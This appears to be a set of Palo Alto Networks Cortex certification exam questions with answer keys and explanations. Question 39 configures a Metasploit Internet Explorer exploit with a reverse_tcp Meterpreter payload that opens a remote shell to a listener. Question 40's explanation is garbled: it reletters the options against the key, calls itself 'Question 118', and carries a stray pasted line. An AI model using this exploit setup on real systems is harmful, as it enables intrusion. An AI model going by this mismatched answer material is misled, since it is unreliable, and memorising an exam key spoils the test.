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## Palo Alto Networks Systems Engineer Professional - Cortex Sample

## Questions (Q36-Q41):

### NEW QUESTION # 36

The Cortex XDR management service requires which other Palo Alto Networks product?

- A. Directory Sync
- **B. Cortex Data Lake**
- C. Panorama
- D. Cortex XSOAR

**Answer: B**

Explanation:

Reference: <https://www.paloaltonetworks.com/cortex/cortex-xdr>

### NEW QUESTION # 37

Which two entities can be created as a BIOC? (Choose two.)

- **A. file**
- B. alert log
- **C. registry**
- D. event log

**Answer: A,C**

Explanation:

<https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-pro-admin/investigation-and-response/cortex-xdr-indicators/working-with-biocs/create-a-bioc-rule.html>

### NEW QUESTION # 38

When preparing the golden image in a Cortex XDR Virtual Desktop Infrastructure (VDI) deployment, which step is required?

- A. Enable the VDI license timeout.
- **B. Scan the image using the imagepreptool.**
- C. Launch the VDI conversion tool.
- D. Disable automatic memory dumps.

**Answer: B**

Explanation:

When preparing the golden image in a Cortex XDR Virtual Desktop Infrastructure (VDI) deployment, it is required to scan the image using the imageprep tool. This tool ensures that the image is properly configured for use in a VDI environment by preparing it for deployment with Cortex XDR.

### NEW QUESTION # 39

A test for a Microsoft exploit has been planned. After some research Internet Explorer 11 CVE-2016-0189 has been selected and a module in Metasploit has been identified (exploit/windows/browser/ms16\_051\_vbscript) The description and current configuration of the exploit are as follows;

```
msf exploit(ms16_051_vbscript) > show options
```

Module options (exploit/windows/browser/ms16\_051\_vbscript):

Name	Current Setting	Required	Description
SRVHOST	10.0.0.10	yes	The local host to listen on.
SRVPORT	8080	yes	The local port to listen on.
SSL	false	no	Negotiate SSL for incoming connections
SSLCert		no	Path to a custom SSL certificate (default is randomly generated)
URIPATH		no	The URI to use for this exploit (default is random)

The admin needs to perform the following steps:

- Configure a reverse\_tcp meterpreter payload
- Set up the meterpreter payload to listen in IP 10.0.0.10
- Set up the meterpreter payload to listen in port 443
- Configure the URL to listen in a path with name "survey"



What is the remaining configuration?

- A. 

```
set PAYLOAD windows/x64/powershell_bind_tcp
set SRVHOST 10.0.0.10
set SRVPORT 443
set URIPATH survey
```
- B. 

```
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set SSLCert survey
set LHOST 10.0.0.10
set LPORT
```
- C. 

```
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set SRVHOST 10.0.0.10
set SRVPORT 443
set URIPATH survey
```
- D. 

```
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.10
set LPORT 443
set URIPATH survey
```

Answer: D

#### NEW QUESTION # 40

What must a customer deploy prior to collecting endpoint data in Cortex XSIAM?

- A. External dynamic list
- B. Playbook
- C. Broker VM
- D. XDR agent

Answer: D

Explanation:

25 web pages

As a Palo Alto Cortex Professional, I'll provide a detailed explanation for Question 118: What must a customer deploy prior to collecting endpoint data in Cortex XSIAM? along with the reasoning and references based on Palo Alto Networks' official documentation and product knowledge.

C: XDR Agent

Cortex XSIAM (Extended Security Intelligence and Automation Management) is an AI-driven security operations platform designed to centralize and automate security operations across an enterprise, including endpoint, network, cloud, and identity data. To collect endpoint data specifically, Cortex XSIAM relies on the Cortex XDR Agent, which is a lightweight software component installed on endpoints (such as laptops, desktops, or servers). This agent is responsible for gathering telemetry data, monitoring endpoint activity,

and enforcing security policies, which are then sent to the Cortex XSIAM cloud for analysis, detection, and response.

Here's why the XDR Agent is the correct choice and why the other options do not apply:

Option A: Playbook

- \* Explanation: A playbook in Cortex XSIAM (or its predecessor, Cortex XSOAR) is a predefined workflow that automates incident response tasks, such as investigating alerts or remediating threats.

While playbooks are critical for automation and orchestration, they are not involved in the initial collection of endpoint data.

Playbooks operate on data that has already been collected and ingested into the system. Therefore, deploying a playbook is not a prerequisite for collecting endpoint data.

- \* Conclusion: Incorrect.

Option B: Broker VM

- \* Explanation: The Broker VM is an optional component in the Cortex ecosystem that can be deployed to enhance connectivity and functionality, such as acting as a proxy for endpoints to communicate with the Cortex cloud, collecting logs, or running additional services. While it can facilitate data forwarding or log collection in certain scenarios (e.g., from third-party sources), it is not a mandatory requirement for collecting endpoint data directly from devices managed by Cortex XSIAM. The XDR Agent can communicate with the Cortex cloud independently without a Broker VM.

- \* Conclusion: Incorrect.

Option C: XDR Agent

- \* Explanation: The Cortex XDR Agent is the core component required to collect endpoint data in Cortex XSIAM. It is installed on supported endpoints (e.g., Windows, macOS, Linux, or Android devices) and performs several key functions:

- \* Data Collection: Gathers detailed telemetry, including process execution, file activity, network connections, and system events.

- \* Prevention: Blocks exploits, malware, and fileless attacks using AI-driven techniques.

- \* Detection and Response: Provides real-time data to the Cortex cloud for advanced analytics and incident investigation. Without the XDR Agent deployed on endpoints, Cortex XSIAM cannot collect the necessary data to monitor, detect, or respond to endpoint-based threats. This makes it the essential prerequisite for endpoint data collection.

- \* Conclusion: Correct.

Option D: External Dynamic List (EDL)

- \* Explanation: An External Dynamic List (EDL) is a feature in Palo Alto Networks' ecosystem used to import and manage dynamic lists of indicators (e.g., IP addresses, URLs, or domains) for use in security policies or threat intelligence. While EDLs can enhance threat detection by providing additional context, they are not involved in the process of collecting endpoint data. They are a supplementary tool rather than a requirement for data collection.

- \* Conclusion: Incorrect.

References from Palo Alto Networks:

- \* Cortex XSIAM Datasheet (Palo Alto Networks):

- \* "Cortex XSIAM unifies best-in-class security operations functions, including Endpoint Detection and Response (EDR)... The platform leverages the Cortex XDR Agent to prevent endpoint attacks and collect full telemetry for detection and response."

- \* This highlights the XDR Agent's role as the mechanism for endpoint data collection.

- \* Cortex XSIAM Solution Brief (Palo Alto Networks):

- \* "XSIAM requires the deployment of the XSIAM Endpoint Agent to appropriate and compatible endpoints to collect telemetry and enforce security."

- \* This directly ties the agent to the data collection process.

- \* Cortex XDR Agent Documentation (Palo Alto Networks Cortex Documentation Portal):

- \* The agent is described as "a lightweight agent that stops threats with Behavioral Threat Protection, AI, and cloud-based analysis while collecting endpoint telemetry for extended detection and response."

- \* Available at: [docs-cortex.paloaltonetworks.com](https://docs-cortex.paloaltonetworks.com)

- \* What is Cortex XSIAM? (Palo Alto Networks Website):

- \* "Endpoint Protection Platform (EPP): Prevents endpoint attacks with a proven endpoint agent that blocks exploits, malware, and fileless attacks and collects full telemetry for detection and response."

- \* This reinforces the agent's foundational role in endpoint data collection.

## NEW QUESTION # 41

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